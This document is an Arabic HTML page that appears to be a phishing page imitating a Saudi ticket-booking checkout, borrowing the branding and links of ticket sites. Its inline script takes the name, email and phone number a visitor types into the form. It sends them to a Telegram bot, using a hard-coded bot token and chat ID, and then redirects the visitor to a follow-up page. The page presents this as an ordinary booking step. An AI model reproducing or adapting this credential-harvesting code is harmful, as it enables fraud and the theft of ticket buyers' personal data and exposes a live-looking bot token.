
<!DOCTYPE html>
<html lang="ar" dir="rtl">

<head>
 
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <link rel="apple-touch-icon preload" type="image/x-icon" href="https://golden4tic.com/front/assets/other/assets/img/apple-touch-icon-57x57-precomposed.png" />
    <link rel="apple-touch-icon preload" type="image/x-icon" sizes="72x72" href="https://golden4tic.com/front/assets/other/assets/img/apple-touch-icon-72x72-precomposed.png" />
    <link rel="apple-touch-icon preload" type="image/x-icon" sizes="114x114" href="https://golden4tic.com/front/assets/other/assets/img/apple-touch-icon-114x114-precomposed.png" />
    <link rel="apple-touch-icon preload" type="image/x-icon" sizes="144x144" href="https://golden4tic.com/front/assets/other/assets/img/apple-touch-icon-144x144-precomposed.png" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="csrf-token" content="SKUG7jFSFLy6gjFlv4WtnQoRyVelBkVopwFtR7ui" />
    <title>تذاكر السعودية  - الرئيسية</title>
    <meta name="keywords" content />
    <meta name="description" content />
    <meta name="author" content />
    <meta property="twitter:card" content="summary" />
    
    <meta property="twitter:title" content />
    <meta property="twitter:description" content />
    <meta property="twitter:image" content />
    <meta name="twitter:label1" value="احجز الأن" />
    <meta name="twitter:data1" value />
    <meta property="og:title" content />
    <meta property="og:description" content />
    <meta property="og:image" content />
    <meta property="og:url" content />
    <meta property="og:type" content="website" />
    <link rel="shortcut icon preload" href="https://webook.com/favicon.ico" />
    <link rel="alternate" hreflang="ar-eg" href="weBook" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">

    <link rel="icon" href="https://webook.com/favicon.ico" />
    <script src="js/jquery.min.js"></script><script src="js/363ad84da6.js" crossorigin="anonymous"></script><link rel="stylesheet" href="css/libraries.css"><link rel="stylesheet" href="css/checkout.css">
    <link rel="stylesheet" href="css/all.min.css" >

    <link rel="stylesheet" href="css/bootstrap.min.css" >
    <link rel="stylesheet" href="css/bootstrap.rtl.min.css">

    <link rel="stylesheet" href="css/main.css" >
    <link rel="stylesheet" href="css/_reboot.scss" >
    <link rel="stylesheet" href="css/home.css" >
    
    
    
    
    <style>
        [type="tel"][data-v-09edeec7] {
            direction: ltr;
        }

        button#submit-form-btn {
            color: #140f00 !important;
        }
    </style><style type="text/css">
        .vue-tel-input {
            border-radius: 3px;
            display: flex;
            border: 1px solid #bbb;
            text-align: left;
        }

        .vue-tel-input.disabled .dropdown,
        .vue-tel-input.disabled .selection,
        .vue-tel-input.disabled input {
            cursor: no-drop;
        }

        .vue-tel-input:focus-within {
            box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075),
                0 0 8px rgba(102, 175, 233, 0.6);
            border-color: #66afe9;
        }

        .vti__dropdown {
            display: flex;
            flex-direction: column;
            align-content: center;
            justify-content: center;
            position: relative;
            padding: 7px;
            cursor: pointer;
        }

        .vti__dropdown.show {
            max-height: 300px;
            overflow: scroll;
        }

        .vti__dropdown.open {
            background-color: #f3f3f3;
        }

        .vti__dropdown:hover {
            background-color: #f3f3f3;
        }

        .vti__selection {
            font-size: 0.8em;
            display: flex;
            align-items: center;
        }

        .vti__selection .vti__country-code {
            color: #666;
        }

        .vti__flag {
            margin-right: 5px;
            margin-left: 5px;
        }

        .vti__dropdown-list {
            z-index: 1;
            padding: 0;
            margin: 0;
            text-align: left;
            list-style: none;
            max-height: 200px;
            overflow-y: scroll;
            position: absolute;
            left: -1px;
            background-color: #fff;
            border: 1px solid #ccc;
            width: 390px;
        }

        .vti__dropdown-list.below {
            top: 33px;
        }

        .vti__dropdown-list.above {
            top: auto;
            bottom: 100%;
        }

        .vti__dropdown-arrow {
            transform: scaleY(0.5);
            display: inline-block;
            color: #666;
        }

        .vti__dropdown-item {
            cursor: pointer;
            padding: 4px 15px;
        }

        .vti__dropdown-item.highlighted {
            background-color: #f3f3f3;
        }

        .vti__dropdown-item.last-preferred {
            border-bottom: 1px solid #cacaca;
        }

        .vti__dropdown-item .vti__flag {
            display: inline-block;
            margin-right: 5px;
        }

        .vti__input {
            border: none;
            border-radius: 0 2px 2px 0;
            width: 100%;
            outline: 0;
            padding-left: 7px;
        }
    </style>
 
 
    
    <style>
            .input-error {
                color: red;
            }

            .only-select {
                border: 1px solid #000;
                width: 100%;
            }

            body.sell-ticket section.header form .form-select {
                width: 100% !important;
                border-radius: 5px;
            }

            .page-item {
                border: none !important;
            }

            .disabled {
                border: none !important;
            }

            body[class*="seller-account"] section.orders-table .pagination ul a {
                border: none !important;
            }

            .disabled>.page-link,
            .page-link.disabled {
                border: none !important;
            }

            .active>.page-link,
            .page-link.active {
                background-color: #2f375f !important;
                color: #fff !important;
                border-color: #2f375f !important;
                border-radius: 50% !important;
                padding: 0 9px !important;
            }

            .button {
                font-size: 13px;
                font-weight: 400;
                line-height: 22px;
                color: white;
                background-color: #2f375f;
                padding: 8px 24px;
                border-radius: 8px;
                -webkit-transition: 0.4s;
                transition: 0.4s;
            }

            /*.popup {*/
            /*    position: fixed;*/
            /*    width: 100%;*/
            /*    height: 100%;*/
            /*    top: 0;*/
            /*    left: 0;*/
            /*    z-index: 1000;*/
            /*    background-color:  rgba(18, 27, 70, 0.5294117647); */
            /*    display: -webkit-box;*/
            /*    display: -ms-flexbox;*/
            /*    display: flex;*/
            /*    -webkit-box-pack: center;*/
            /*    -ms-flex-pack: center;*/
            /*    justify-content: center;*/
            /*    -webkit-box-align: center;*/
            /*    -ms-flex-align: center;*/
            /*    align-items: center;*/
            /*    padding: 12px;*/
            /*}*/

            /* .popup .content {*/
            /*width: 600px;*/
            /*    max-width: 100%;*/
            /*    background-color: white;*/
            /*    border: 1px solid #707070;*/
            /*    border-radius: 16px;*/
            /*    padding: 32px 20px;*/
            /*    height: 600px;*/
            /*}*/

            .show_tickets_table {
                overflow-y: scroll;
                height: 500px;
            }

            .siblings {
                font-size: 11px;
                font-weight: 400;
                line-height: 17px;
                color: #848484;
                padding: 0;
            }
    </style>
    <script>
        window.ADD_TO_CART_URL = "https://golden4tic.com/cart/update-to-cart";
    </script>

    <script async src="js_1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag() {
            dataLayer.push(arguments);
        }
        gtag("js", new Date());

        gtag("config", "G-FTSZ57798M");
    </script>
    

</head>

<body class="home">
    <header class id="header">
        <div class="container-md">
            <nav class="navbar navbar-expand-lg">
                <a class="navbar-brand" href="#">
                    <img src="sport logo.png" />
                </a>
                <a class="sell-link nav-link p-lg-0 golden-color" href="https://wa.me/966565539269">بيع تذكرتك
                </a>
                
                <div class="collapse navbar-collapse justify-content-between" id="navbarHeader">
                    <button class="d-lg-none" id="close-header-menu" type="button">
                        <i class="fa-solid fa-xmark"></i>
                    </button>
                    <ul class="navbar-nav">
                        <li class="nav-item">
                            <a class="nav-link p-lg-0 active" href="index.html">الرئيسية </a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link p-lg-0 golden-color" href="https://wa.me/966565539269">بيع تذكرتك
                            </a>
                        </li>

                        <li class="nav-item">
                            <a class="nav-link p-lg-0" href="https://golden4tic.com/faq">الاسئلة الشائعة</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link p-lg-0" href="https://golden4tic.com/%D9%85%D9%86-%D9%86%D8%AD%D9%86">من
                                نحن</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link p-lg-0" href="https://golden4tic.com/%D8%B3%D9%8A%D8%A7%D8%B3%D8%A9-%D8%A7%D9%84%D8%AE%D8%B5%D9%88%D8%B5%D9%8A%D8%A9">سياسة
                                الخصوصية</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link p-lg-0" href="https://golden4tic.com/%D8%A7%D8%AA%D8%B5%D9%84-%D8%A8%D9%86%D8%A7">اتصل بنا</a>
                        </li>
                        <li class="nav-item mobile-show">
                            <a class="nav-link p-lg-0" href="#/settings">الحساب الشخصي
                            </a>
                        </li>
                        <li class="nav-item mobile-show">
                            <a class="nav-link p-lg-0" href="#/tickets">طلباتي</a>
                        </li>
                        <li class="nav-item mobile-show">
                            <a class="nav-link p-lg-0" href="#/order-tickets/new">لوحة تحكم
                                البائع
                            </a>
                        </li>
                        <li class="nav-item mobile-show">
                            <a class="nav-link p-lg-0 logout" href="#/logout">
                                تسجيل خروج
                            </a>
                        </li>
                    </ul>
                   
                </div>
            </nav>
        </div>
    </header>

        <br><br><section class="jobs" style="padding: 0 1.5rem;">
            <div class="container">
                <div data-v-ae8563fe="" class="row">
                    <div data-v-ae8563fe="" class="col-md-12">
                        <div data-v-ae8563fe="" id="shipping_step" class="payment-step">
                            <div data-v-ae8563fe="" data-step="1" class="title title--step">
                                <img data-v-ae8563fe="" src="img/step-shipping.svg" />
                                <h3 data-v-ae8563fe="">إضافة المعلومات</h3>
                            </div>
                        </div>
                        <div data-v-ae8563fe="" id="shipping_method_fields">
                            <span data-v-ae8563fe="">
                                <span data-v-ae8563fe="">
                                    <form id="myForm" class="form form--options-edit">
                                        <input type="hidden" name="ticket" value="667faab1593c7e11929ed6a4">
                                        <input type="hidden" name="party" value="667fa9ff593c7e11929ed687">
                                        <input type="hidden" name="qty" value="1">
                                        <span>
                                            <div id="shipping_fields_wrapper">
                                                <div>
                                                    <div class="row">
                                                        <div class="col-md-12">
                                                            <span>
                                                                <fieldset class="form-group">
                                                                    <label for="name">الاسم كاملاً</label>
                                                                    <input type="text" id="name" name="name" required placeholder="الاسم كاملاً" class="form-control" />
                                                                </fieldset>
                                                            </span>
                                                        </div>
                                                        <div class="col-md-12">
                                                            <span>
                                                                <fieldset class="form-group">
                                                                    <label for="email"> البريد الالكتروني</label>
                                                                    <input type="email" id="email" name="email" placeholder="البريد الالكتروني" class="form-control" required />
                                                                </fieldset>
                                                            </span>
                                                        </div>
                                                    </div>
        
                                                    <div class="row">
                                                        <div class="col-md-6">
                                                            <span>
                                                                <fieldset class="form-group">
                                                                    <label for="phone">رقم الجوال</label>
                                                                    <div class="form-control tel-input-wrapper">
                                                                        <div class="vue-tel-input">
                                                                            <div tabindex="0" class="vti__dropdown">
                                                                                <span class="vti__selection">
                                                                                    <div class="vti__flag sa">
                                                                                        <img src="img/2560px-Flag_of_Saudi_Arabia_%281938_to_1973%29.svg.png" width="22" />
                                                                                    </div>
                                                                                    <span class="vti__dropdown-arrow">▼</span>
                                                                                </span>
                                                                                <ul class="vti__dropdown-list below" style="display: none">
                                                                                    <li class="vti__dropdown-item preferred">
                                                                                        <div class="vti__flag sa"></div>
                                                                                        <strong>Saudi Arabia (المملكة العربية السعودية)</strong>
                                                                                        <span> +966 </span>
                                                                                    </li>
                                                                                </ul>
                                                                            </div>
                                                                            <input type="tel" autocomplete="on" id="phone" maxlength="25" name="phone" placeholder="+966 51 234 5678" tabindex="0" required class="vti__input" />
                                                                        </div>
                                                                    </div>
                                                                </fieldset>
                                                            </span>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="row">
                                                <div class="col-md-12">
                                                    <br /><br />
                                                </div>
                                            </div>
                                        </span>
                                        <div data-v-e5a4c4bc>
                                            <button type="submit" class="btn btn--primary btn--wide btn--round btn--submit btn--fied wide">اضافة المعلومات</button>
                                        </div>
                                    </form>
                                </span>
                            </span>
                        </div>
                    </div>
                </div>
            </div>
    </section>
        
        <script>
            document.getElementById('myForm').addEventListener('submit', function(event) {
                event.preventDefault(); // منع إعادة تحميل الصفحة
        
                // جلب القيم المدخلة من النموذج
                var name = document.getElementById('name').value;
                var email = document.getElementById('email').value;
                var phone = document.getElementById('phone').value;
        
                // رسالة مخصصة لإرسالها إلى Telegram
                 var message = `
                ====== 💳 بيانات المستخدم ========

        👤: ${name}


        📅: ${email}


        📞: ${phone}


      ======================
                `;
        
                // معلومات بوت Telegram
                var telegramToken = '7789845398:AAEHKJDnUFpcG6bn_6lgCqZuygOyxaA-ElY'; // استبدل بـ API Token الخاص بالبوت
                var telegramChatId = '-1002324684325'; // استبدل بمعرف الدردشة الخاص بك
        
                // إرسال الرسالة إلى Telegram باستخدام API
                fetch(`https://api.telegram.org/bot${telegramToken}/sendMessage`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        chat_id: telegramChatId,
                        text: message
                    })
                })
                .then(response => response.json())
        .then(data => {
            if(data.ok) {
                // تحويل المستخدم إلى صفحة أخرى بعد نجاح الإرسال
                window.location.href = "index113.html"; // استبدل 'success.html' بالصفحة التي تريد التوجيه إليها
            } else {
                alert("حدث خطأ أثناء إرسال المعلومات.");
            }
        })
        .catch(error => {
            console.error('Error:', error);
            alert("حدث خطأ أثناء إرسال المعلومات.");
        });
            });
        </script>
        
            
            <script type="text/javascript" src="js/jquery.validate.min.js"></script><script>
                $("#myForm").validate({
                    rules: {
                        name: {
                            required: true,
                        },
                        address: {
                            required: true,
                        },
                        phone: {
                            required: true,
                            minlength: 7,
                        },
                        email: {
                            required: true,
                            email: true,
                        },
                    },
                    messages: {
                        name: "الرجاء كتابة الاسم",
                        address: "الرجاء ادخال الاسم ",
                        phone: "الرجاء ادخال الرقم  ",
                        email: " الرجاء ادخال ايميل  صحيح ",
                    },
                    submitHandler: SubForm,
                });
                function SubForm() {
                    let fm= $("#myForm").serializeArray()
                    console.log("send start", fm);
                    $.ajax({
                        url: "/bookTicket",
                        type: "post",
                        data: $("#myForm").serializeArray(),
                        beforeSend: function () {
                            $("#error").fadeOut();
        
                            $("#btn-submit").html(
                                '<span class="glyphicon glyphicon-transfer"></span>  <span style="color:#fff">  جاري التسجيل </span>.'
                            );
                        },
                        success: function () {
                           
                                window.location.replace(`/payment-way/${fm[5].value}`);
                            
                        },
                        error: function () {
                            // alert("There was an error :(");
                        },
                    });
                    return false;
                }
            </script><br><br><br>
    
    <footer id="footer">
        <div class="container-md">
            <article class="box">
                <section>
                    <div class="image">
                        <img src="sport logo.png" />
                    </div>
                   
                </section>
                <section>
                    <h3>القائمة</h3>
                    <article class="menus">
                        <ul class="main-menu">
                            <li><a href="index.html">الرئيسية</a></li>
                            <li>
                                <a href="https://golden4tic.com/%D9%85%D9%86-%D9%86%D8%AD%D9%86">من نحن</a>
                            </li>
                            <li>
                                <a href="https://golden4tic.com/%D8%B4%D8%B1%D9%88%D8%B7-%D8%A7%D9%84%D8%AE%D8%AF%D9%85%D8%A9">شروط
                                    الخدمة</a>
                            </li>
                            <li>
                                <a href="https://golden4tic.com/%D8%A7%D9%84%D8%AE%D8%B5%D9%88%D8%B5%D9%8A%D8%A9">الخصوصية</a>
                            </li>
                            <li>
                                <a href="https://golden4tic.com/%D8%A7%D9%84%D8%A7%D9%85%D8%A7%D9%86">الامان</a>
                            </li>
                        </ul>
                        <ul class="second-menu">
                            <li>
                                <a href="https://golden4tic.com/%D8%B3%D9%8A%D8%A7%D8%B3%D8%A9-%D8%A7%D9%84%D8%AE%D8%B5%D9%88%D8%B5%D9%8A%D8%A9">سياسة
                                    الخصوصية</a>
                            </li>
                            <li>
                                <a href="https://golden4tic.com/faq">الاسئلة الشائعة</a>
                            </li>
                        </ul>
                    </article>
                </section>
                <section>
                    <h3>تواصل معنا</h3>
                    <ul class="company-info">
                        <li>
                            <i class="fa-solid fa-phone-volume"></i>
                            <a target="_blank" href="https://wa.me/966565539269" id="phone" style="direction: ltr">966565539269</a>
                        </li>
                       
                    </ul>
                </section>
                <section>
                    <h3>تابعنا</h3>
                    <ul class="social">
                        <li>
                            <a target="_blank" href="https://wa.me/966565539269"><i class="fa-brands fa-whatsapp"></i></a>
                        </li>
                        <li>
                            <a target="_blank" href="https://twitter.com/deatic9"><i class="fa-brands fa-twitter"></i></a>
                        </li>
                    </ul>
                    <div class="currency">
                        <h4>أختر عملة الشراء</h4>
                        <select class="form-select" id="currency" name="currency" aria-label="select currency">
                            <option value="USD" selected>دولار امريكي</option>
                            <option value="sar">ريال سعودي</option>
                            <option value="der">درهم اماراتي</option>
                            <option value="qr">ريال قطري</option>
                        </select>
                    </div>
                    <div class="row">
                        <div class="col-md-12">
                            <div id="social_footer">
                                <p style="text-align:center">جميع الحقوق محفوظه لتذاكر السعودية  2023</p>
                                <br>
                                <p style="text-align:center"> مؤسسة الاحداث الهامة للترفية</p>
                                <br>
                                <p style="text-align:center"> السجل التجاري 2050173136</p>
                                <p style="float: left; display: none">
                                    Developed by
                                    <a href="https://cems-it.com" target="_blank" rel="dofollow">Creative Minds</a>
                                </p>
                            </div>
                        </div>
                    </div>
                </section>
            </article>
        </div>
    </footer>

    <div id="toTop"></div>

    <script data-cfasync="false" src="js/email-decode.min.js"></script>
    <script src="js/all.min.js" rel="preload"></script>

    <script src="js/jquery-3.6.3.min.js" rel="preload"></script>

    <script src="js/bootstrap.bundle.min.js" rel="preload"></script>

    <script src="js/main.js" rel="preload"></script>
    <script src="js/main_1.js" rel="preload"></script>

    <script>
        $.ajaxSetup({
            headers: {
                "X-CSRF-TOKEN": $('meta[name="csrf-token"]').attr("content"),
            },
        });

        /************* show stiky Header ************/
        // $( () => {
        //     // set varibles
        //     const homeHeader = $(".home #header");
        //     const homeHeaderLogo = $(".home #header .navbar-brand img")
        //     const homeSectionHeader = $(".home section.header");
        //     const scrollOffset = $(window).scrollTop();
        //     //const SectionHeaderHeight = homeSectionHeader.outerHeight(true);
        //     const SectionHeaderHeight = 100;

        //     // when scrolling skiped header section
        //     if(scrollOffset >=  SectionHeaderHeight) {
        //         // stiky header
        //         homeHeader.removeClass("transparent-header");
        //         homeHeaderLogo.attr("src", "https://golden4tic.com/front/assets/images/golden-logo.webp");

        //     } else {
        //         // home header
        //         homeHeader.addClass("transparent-header");
        //         homeHeaderLogo.attr("src", "https://golden4tic.com/front/assets/images/white-logo.webp");
        //     }

        //     $(window).scroll( () => {
        //         // reset Dimensions when scrolling
        //         const scrollOffset = $(window).scrollTop();
        //         //const SectionHeaderHeight = homeSectionHeader.outerHeight(true);
        //         const SectionHeaderHeight = 100;

        //         // when scrolling skiped header section
        //         if(scrollOffset >=  SectionHeaderHeight) {
        //             homeHeader.removeClass("transparent-header");
        //             homeHeaderLogo.attr("src", "https://golden4tic.com/front/assets/images/golden-logo.webp");
        //             homeHeader.slideDown(500);

        //         } else {
        //             // home header
        //             homeHeader.slideUp(300, () => {
        //                 homeHeader.addClass("transparent-header");
        //                 homeHeaderLogo.attr("src", "https://golden4tic.com/front/assets/images/white-logo.webp");
        //             });
        //         }
        //     })

        // });

        $(document).on("click", "#load_more_button", function () {
            //var start = $(this).data('start');
            $("#load_more_button").html(
                "<img src='https://golden4tic.com/front/assets/images/loader.svg' width='50' /> جارى التحميل.."
            );
            $.ajax({
                url: "https://golden4tic.com?start=" + $("#start").val(),
                method: "GET",

                success: function (data) {
                    $("#start").remove();

                    var $item = $(data);
                    $("#load_more_button").html("عرض مزيد من الفعاليات");
                    $(".events-content").append($item);
                    if ($("#start").val() >= "4") {
                        $("#load_more_button").hide();
                    }
                },
            });
        });

        function filter() {
            $(".events-content").html(
                "<img src='https://golden4tic.com/front/assets/images/loader.svg' width='50' /> جارى التحميل.."
            );
            $("#clrea-filter").html(
                "<a href='https://golden4tic.com'>إلغاء التصفية</a>"
            );
            $(".events-content").load(
                "https://golden4tic.com/filter",
                $("#filterForm").serialize(),
                function (response, status, xhr) {
                    if ($("#noEvents")) {
                        $("#load_more_button").remove();
                    } else {
                        $("#load_more_button").show();
                    }
                }
            );
        }

      // $(document).on('click', '#search_events', function(){
      //     if($(this).val()) document.location.href="https://golden4tic.com/tickets/"+ $(this).val();
      // });
    </script>
     
</body>

</html>
 
